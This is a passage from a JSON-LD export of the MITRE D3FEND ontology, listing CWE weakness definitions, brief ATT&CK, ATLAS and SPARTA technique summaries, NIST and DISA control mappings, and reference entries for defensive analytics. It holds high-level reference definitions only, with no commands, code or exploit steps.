        "@type": "xsd:anyURI",
        "@value": "https://www.sap-press.com/organizational-management-in-sap-erp-hcm_3996/"
      },
      "d3f:kb-author": "Soham Ray",
      "d3f:kb-organization": "SAP Press",
      "d3f:kb-reference-of": {
        "@id": "d3f:OrganizationMapping"
      },
      "d3f:kb-reference-title": "Organization Mapping in SAP ERP HCM",
      "rdfs:label": "Reference - Organizational Management in SAP ERP HCM"
    },
    {
      "@id": "d3f:CWE-83",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-83",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes \"javascript:\" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.",
      "rdfs:label": "Improper Neutralization of Script in Attributes in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:Reference-GenericRegsvr32_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-002/"
      },
      "d3f:kb-abstract": "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-002: Generic Regsvr32",
      "rdfs:label": "Reference - CAR-2019-04-002: Generic Regsvr32 - MITRE"
    },
    {
      "@id": "d3f:T1585",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585",
      "d3f:definition": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)",
      "rdfs:label": "Establish Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000767_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for local access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000767"
    },
    {
      "@id": "d3f:T1011.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1011.001",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.",
      "rdfs:label": "Exfiltration Over Bluetooth",
      "rdfs:subClassOf": {
        "@id": "d3f:T1011"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "RA-5(7)"
    },
    {
      "@id": "d3f:CWE-360",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-360",
      "d3f:definition": "Security based on event locations are insecure and can be spoofed.",
      "rdfs:label": "Trust of System Event Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1547.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.002",
      "d3f:definition": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Authentication Package",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N6a4ff3bb1981492ba6120e28b18d03dd"
        }
      ]
    },
    {
      "@id": "_:N6a4ff3bb1981492ba6120e28b18d03dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1558.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558.003",
      "d3f:definition": "Service Provider Name (SPN) scanning is one way to gather hashes, which results in RPC calls conforming to the NSPI protocol.",
      "d3f:may-produce": {
        "@id": "d3f:RPCNetworkTraffic"
      },
      "rdfs:label": "Kerberoasting",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nspi/6dd0a3ea-b4d4-4a73-a857-add03a89a543"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1558"
        },
        {
          "@id": "_:N929c14d3393240d1a1c9e3d5ce88c050"
        }
      ]
    },
    {
      "@id": "_:N929c14d3393240d1a1c9e3d5ce88c050",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002211_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, applies the same security policy filtering to metadata as it applies to data payloads.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002211"
    },
    {
      "@id": "d3f:T1487",
      "@type": "owl:Class",
      "d3f:attack-id": "T1487",
      "d3f:definition": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1561.002",
      "rdfs:label": "Disk Structure Wipe",
      "rdfs:seeAlso": {
        "@id": "d3f:T1561.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1453",
      "@type": "owl:Class",
      "d3f:attack-id": "T1453",
      "d3f:definition": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**",
      "rdfs:label": "Abuse Accessibility Features - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Abuse Accessibility Features"
    },
    {
      "@id": "d3f:CWE-499",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-499",
      "d3f:definition": "The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class.",
      "rdfs:label": "Serializable Class Containing Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-UnderstandingtheDomainRegistrationBehaviorofSpammers",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=bf4d34a6f9d0168bb07433e84c1567bbe1ba8188"
      },
      "d3f:kb-abstract": "Spammers register a tremendous number of domains to evade blacklisting and takedown efforts. Current techniques to detect such domains rely on crawling spam URLs or monitoring lookup traffic. Such detection techniques are only effective after the spammers have already launched their campaigns, and thus these countermeasures may only come into play after the spammer has already reaped significant benefits from the dissemination of large volumes of spam. In this paper we examine the registration process of such domains, with a particular eye towards features that might indicate that a given domain likely has a malicious purpose at registration time, before it is ever used for an attack. Our assessment includes exploring the characteristics of registrars, domain life cycles, registration bursts, and naming patterns. By investigating zone changes from the .com TLD over a 5-month period, we discover that spammers employ bulk registration, that they often re-use domains previously registered by others, and that they tend to register and host their domains over a small set of registrars. Our findings suggest steps that registries or registrars could use to frustrate the efforts of miscreants to acquire domains in bulk, ultimately reducing their agility for mounting large-scale attacks.",
      "d3f:kb-author": "Hao S, Thomas M, Paxson V, Feamster N, Kreibich C, Grier C, Hollenbeck S",
      "d3f:kb-reference-of": {
        "@id": "d3f:DomainRegistrationTakedown"
      },
      "d3f:kb-reference-title": "Understanding the Domain Registration Behavior of Spammers",
      "rdfs:label": "Reference - Understanding the Domain Registration Behavior of Spammers"
    },
    {
      "@id": "d3f:IA-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.02",
      "d3f:definition": "Adversaries may employ their own satellite or hosted payload to achieve proximity and a privileged RF geometry. After phasing into the appropriate plane or drift orbit, the rogue vehicle operates as a local peer: emitting narrow-beam or crosslink-compatible signals, relaying user-channel traffic that the target will honor, or advertising services that appear to originate from a trusted neighbor. Close range reduces path loss and allows highly selective interactions, e.g., targeted spoofing of acquisition exchanges, presentation of crafted routing/time distribution messages, or injection of payload tasking that rides established inter-satellite protocols. The rogue platform can also perform spectrum and protocol reconnaissance in situ, refining message formats and timing before attempting first execution.",
      "rdfs:label": "Rogue Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "Rogue Spacecraft"
    },
    {
      "@id": "d3f:OTDeviceIdentificationMessage",
      "@type": "owl:Class",
      "d3f:definition": "Identify devices on the network.",
      "rdfs:comment": [
        "BACnet: i-Am\nBACnet: i-Have\nBACnet: who-Has\nBACnet: who-Is ",
        "ENIP: List Identity",
        "Modbus: Read Device Identification\nModbus: Report Slave ID"
      ],
      "rdfs:label": "OT Device Identification Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:RealTimeOperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ]
    },
    {
      "@id": "d3f:LinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LRL",
      "d3f:definition": "A supervised learning method that builds a linear regression model using training data.",
      "d3f:kb-article": "## References\n- Gawali, Suvarna. “Linear Regression Algorithm to Make Predictions Easily.” Analytics Vidhya, 22 July 2022, https://www.analyticsvidhya.com/blog/2021/06/linear-regression-in-machine-learning/.\n- Nau, Robert. “Statistical Forecasting: Notes On Regression and Time Series Analysis.” Introduction to Linear Regression Analysis, Duke University Fuqua School of Business, 18 Aug. 2020, https://people.duke.edu/~rnau/regintro.htm.\n- Ng, Ritchie. “Evaluating a Linear Regression Model.” Ritchieng.github.io, 8 Jan. 2023, https://www.ritchieng.com/machine-learning-evaluate-linear-regression-model/.\n- Bochkarev, Alexei. \"A New Typology Design of Performance Metrics to Measure Errors in Machine Learning Regression Algorithms\", 2019, https://www.researchgate.net/publication/330661543_A_New_Typology_Design_of_Performance_Metrics_to_Measure_Errors_in_Machine_Learning_Regression_Algorithms.",
      "rdfs:label": "Linear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:LinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:CCI-001111_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents remote devices that have established a non-remote connection with the system from communicating outside of that communications path with resources in external networks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001111"
    },
    {
      "@id": "d3f:ConsoleOutputFunction",
      "@type": "owl:Class",
      "d3f:definition": "Outputs characters to a computer console.",
      "rdfs:label": "Console Output Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:MeanAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAD",
      "d3f:definition": "The mean absolute deviation (MAD), also referred to as the \"mean deviation\" or sometimes \"average absolute deviation\", is the mean of the data's absolute deviations around the data's mean: the average (absolute) distance from the mean.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "d3f:synonym": "MAD",
      "rdfs:label": "Mean Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:AverageAbsoluteDeviation"
      }
    },
    {
      "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc3851"
      },
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-title": "Secure/Multipurpose Internet Mail Extensions (S/MIME) Version 3.1 Message Specification",
      "rdfs:label": "Reference - Secure/Multipurpose Internet Mail Extensions (S/MIME) Version 3.1"
    },
    {
      "@id": "d3f:OSAPIFunction",
      "@type": "owl:Class",
      "d3f:definition": "A callable interface provided by an operating system that allows applications or other software components to interact with and utilize the underlying system resources, services, or functionalities.",
      "rdfs:label": "OS API Function",
      "rdfs:seeAlso": [
        {
          "@id": "http://dbpedia.org/page/Linux_kernel_interfaces"
        },
        {
          "@id": "dbr:Windows_API"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:may-isolate",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may isolate",
      "rdfs:label": "may-isolate",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:DescriptionLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DL",
      "d3f:definition": "A description logic (DL) is a form of logic usually more expressive than propositional logic but less expressive than first-order logic.",
      "d3f:kb-article": "## How it works\nThe core reasoning problems for description logics (DLs) are (usually) decidable, and efficient decision procedures have been designed and implemented for these problems. There are general, spatial, temporal, spatiotemporal, and fuzzy description logics, and each description logic features a different balance between expressive power and reasoning complexity by supporting different sets of mathematical constructors.\n\nDLs are used in artificial intelligence to describe and reason about the relevant concepts of an application domain (known as terminological knowledge). It is of particular importance in providing a logical formalism for ontologies and the Semantic Web: the Web Ontology Language (OWL) and its profiles are based on DLs.\n\n## References\n1. Description logic. (2023, April 16). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Description_logic)",
      "rdfs:label": "Description Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:LogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Log"
      },
      "d3f:definition": "A log file is a file that records either events that occur in an operating system or other software runs, or messages between different users of a communication software. Logging is the act of keeping a log. In the simplest case, messages are written to a single log file.\n\nA transaction log is a file (i.e., log) of the communications between a system and the users of that system, or a data collection method that automatically captures the type, content, or time of transactions made by a person from a terminal with that system. For Web searching, a transaction log is an electronic record of interactions that have occurred during a searching episode between a Web search engine and users searching for information on that Web search engine.\n\nMany operating systems, software frameworks and programs include a logging system. A widely used logging standard is syslog, defined in Internet Engineering Task Force (IETF) RFC 5424). The syslog standard enables a dedicated, standardized subsystem to generate, filter, record, and analyze log messages. This relieves software developers of having to design and code their own ad hoc logging systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Log_file"
      },
      "rdfs:label": "Log File",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06515875-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N0716313f9b2f48c9811c0a80766697ec"
        }
      ]
    },
    {
      "@id": "_:N0716313f9b2f48c9811c0a80766697ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:CWE-288",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-288",
      "d3f:definition": "The product requires authentication, but the product has an alternate path or channel that does not require authentication.",
      "rdfs:label": "Authentication Bypass Using an Alternate Path or Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-306"
      }
    },
    {
      "@id": "d3f:CWE-671",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-671",
      "d3f:definition": "The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.",
      "rdfs:label": "Lack of Administrator Control over Security",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:FileContentAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileContentAnalysis"
      ],
      "d3f:d3fend-id": "D3-FCOA",
      "d3f:definition": "Employing a pattern matching algorithm to statically analyze the content of files.",
      "d3f:kb-article": "## How it works\nAnalyzing a piece of code without it being executed in a sandbox, virtual machine, or simulator. Patterns or signatures in the file can indicate whati kind of software it is, including whether it is malware.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CyberVaccineAndPredictiveMalwareDefensiveMethodsAndSystems"
      },
      "rdfs:label": "File Content Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:FileAnalysis"
      }
    },
    {
      "@id": "d3f:GradientBoostedDecisionTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBDT",
      "d3f:definition": "A gradient-boosted decision tree is, as in other bagging and boosting methods, a method where the relatively 'weak' machine learning model (a decision tree) is used in an ensemble to form a 'strong' machine learning model.",
      "d3f:kb-article": "## Reference\n\n1. Google. (28 Sep 2023). Gradient Boosted Decision Trees.\n[Link](https://developers.google.com/machine-learning/decision-forests/intro-to-gbdt).",
      "rdfs:label": "Gradient-Boosted Decision Tree",
      "rdfs:subClassOf": {
        "@id": "d3f:CART"
      }
    },
    {
      "@id": "d3f:CWE-1314",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1314",
      "d3f:definition": "The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.",
      "rdfs:label": "Missing Write Protection for Parametric Data Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-862"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Network Access to Privileged Commands",
      "d3f:exactly": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(3)"
    },
    {
      "@id": "d3f:PasswordStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user repository of account passwords, often accessed via a password manager.",
      "rdfs:label": "Password Store",
      "rdfs:seeAlso": {
        "@id": "dbr:Password_manager"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordDatabase"
      }
    },
    {
      "@id": "d3f:AML.TA0013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0013",
      "d3f:definition": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.",
      "rdfs:label": "Credential Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0013"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Credential Access"
    },
    {
      "@id": "d3f:broader",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x broader y: The entity x represents a more general or inclusive concept than entity y.",
      "rdfs:label": "broader",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-002%3ABatchFileWriteToSystem32_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-002/"
      },
      "d3f:kb-abstract": "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\\Windows\\System32 directory tree. There will be only occasional false positives due to administrator actions.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-002: Batch File Write to System32",
      "rdfs:label": "Reference - CAR-2021-05-002: Batch File Write to System32 - MITRE"
    },
    {
      "@id": "d3f:CWE-283",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-283",
      "d3f:definition": "The product does not properly verify that a critical resource is owned by the proper entity.",
      "rdfs:label": "Unverified Ownership",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-282"
      }
    },
    {
      "@id": "d3f:FileDecryptionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a previously encrypted file is decoded, rendering its content accessible to authorized users or processes.",
      "rdfs:label": "File Decryption Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Naca00518133e4776a16604de4841695f"
        }
      ]
    },
    {
      "@id": "_:Naca00518133e4776a16604de4841695f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileEncryptionEvent"
      }
    },
    {
      "@id": "d3f:d3fend-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-annotation y: The d3fend object x has the annotation y.",
      "rdfs:label": "d3fend-annotation",
      "rdfs:subPropertyOf": {
        "@id": "owl:versionInfo"
      }
    },
    {
      "@id": "d3f:LogoffEvent",
      "@type": "owl:Class",
      "d3f:definition": "An authentication event where an active session is conclusively terminated, resulting in the cessation of access and deallocation of resources associated with the session, ensuring that the connection to the system, application, or resource no longer exists.",
      "rdfs:label": "Logoff Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N0bea8338761945b9ab2d462a2bdcf141"
        },
        {
          "@id": "_:Nf4d14ba4dc92441381b1fd29bb29b3db"
        }
      ]
    },
    {
      "@id": "_:N0bea8338761945b9ab2d462a2bdcf141",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "_:Nf4d14ba4dc92441381b1fd29bb29b3db",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LogonEvent"
      }
    },
    {
      "@id": "d3f:T1583.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.008",
      "d3f:definition": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations  online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.",
      "rdfs:label": "Malvertising",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:CWE-1092",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1092",
      "d3f:definition": "The product uses the same control element across multiple architectural layers.",
      "rdfs:label": "Use of Same Invokable Control Element in Multiple Architectural Layers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1084",
      "@type": "owl:Class",
      "d3f:attack-id": "T1084",
      "d3f:definition": "Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.003",
      "rdfs:label": "Windows Management Instrumentation Event Subscription",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IR-4_12",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Incident Handling | Malicious Code and Forensic Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DynamicAnalysis"
      },
      "rdfs:label": "IR-4(12)"
    },
    {
      "@id": "d3f:AML.T0008",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008",
      "d3f:definition": "Adversaries may buy, lease, or rent infrastructure for use throughout their operation.\nA wide variety of infrastructure exists for hosting and orchestrating adversary operations.\nInfrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services.\nFree resources may also be used, but they are typically limited.\nInfrastructure can also include physical components such as countermeasures that degrade or disrupt AI components or sensors, including printed materials, wearables, or disguises.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation.\nSolutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services.\nDepending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
      "rdfs:label": "Acquire Infrastructure - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Infrastructure"
    },
    {
      "@id": "d3f:DigitalSignalProcessingApplication",
      "@type": "owl:Class",
      "d3f:definition": "A Digital Signal Processing (DSP) application is a software system that ingests discrete-time or discrete-space signals (from sensors, ADCs, or files) and applies digital signal processing algorithms to analyze, transform, synthesize, or make decisions about those signals, often under real-time throughput and latency constraints. It encompasses capabilities such as filtering, spectral analysis, modulation/demodulation, channelization, synchronization, detection and estimation, compression, beamforming, and reconstruction, and spans domains including software-defined radio (e.g., waveform generation and physical-layer stacks), audio and speech, image and video, radar/sonar/LiDAR, biomedical signals, instrumentation, and control.",
      "d3f:synonym": "DSP Application",
      "rdfs:label": "Digital Signal Processing Application",
      "rdfs:seeAlso": {
        "@id": "dbr:Digital_signal_processing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:CWE-527",
      "@type": "owl:Class",
